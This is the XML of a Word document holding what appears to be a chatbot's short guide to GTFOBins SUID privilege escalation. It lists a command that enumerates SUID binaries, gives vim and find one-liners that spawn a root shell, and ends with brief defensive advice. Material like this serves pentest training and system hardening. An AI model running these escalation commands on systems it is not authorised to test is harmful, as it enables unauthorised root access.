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23A5" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve">Alright — here’s the </w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>short, punchy version</w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GTFOBins SUID-based privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA81BE1" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:pict w14:anchorId="4499AD67">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F423D4A" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What is GTFOBins?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3609FC" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve"> is a public list of Unix binaries that can be abused for </w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329FB09" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve">If a binary has the </w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SUID bit set</w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve"> (runs as the file owner, often root), it can potentially be exploited to execute commands with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C907716" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:pict w14:anchorId="569E2F71">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3579A2" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Finding SUID Binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7788123E" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t>find / -type f -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A30BEEC" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve">If you see something unusual (not part of default SUID binaries list), check it on </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00717A2D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00717A2D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B193ADF" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:pict w14:anchorId="0D8EF8E4">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F486BC" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Example Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE18860" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t>Let’s say /usr/bin/vim is SUID-root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339BFEA" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t>/usr/bin/vim -c ':!sh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7984435B" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve">Boom — you now have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6218E19C" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:pict w14:anchorId="40EEF973">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93F8B5" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Another Example (Less Obvious)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB92C32" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t>If find is SUID-root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE13821" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t>find . -exec /bin/sh -p \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77332C24" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t>The -p keeps the privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01315F56" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:pict w14:anchorId="2AE49A94">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E231C44" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Defense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04003520" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:t>Remove SUID bit from non-essential binaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702B218" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t>chmod u-s /path/to/binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76EF4D" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A2D">
        <w:t>Monitor with file integrity tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C739BC" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:pict w14:anchorId="1F0AE587">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEB632" w14:textId="77777777" w:rsidR="00717A2D" w:rsidRPr="00717A2D" w:rsidRDefault="00717A2D" w:rsidP="00717A2D">
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve">If you want, I can also give you a </w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>quick reference table</w:t>
      </w:r>
      <w:r w:rsidRPr="00717A2D">
        <w:t xml:space="preserve"> of the most common exploitable SUID binaries and their one-liners. That would speed up privilege escalation in pentests a lot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B59E8" w14:textId="77777777" w:rsidR="0000111E" w:rsidRPr="00717A2D" w:rsidRDefault="0000111E" w:rsidP="00717A2D"/>
    <w:sectPr w:rsidR="0000111E" w:rsidRPr="0071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804"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A20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C80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="765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5773"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C0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52C7C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8868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17120">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="991249857">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1422022373">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="93142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41"/>
    <w:rsid w:val="0000111E"/>
    <w:rsid w:val="00354E26"/>
    <w:rsid w:val="004D026E"/>
    <w:rsid w:val="005E4A76"/>
    <w:rsid w:val="00717A2D"/>
    <w:rsid w:val="0072345A"/>
    <w:rsid w:val="0083565D"/>
    <w:rsid w:val="00847741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BDFCF-BFCF-4FD0-8E53-D6A6A65F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4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4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4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4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4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4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4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4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4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4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4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47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4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47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6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tfobin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2025-08-15T02:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-15T04:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>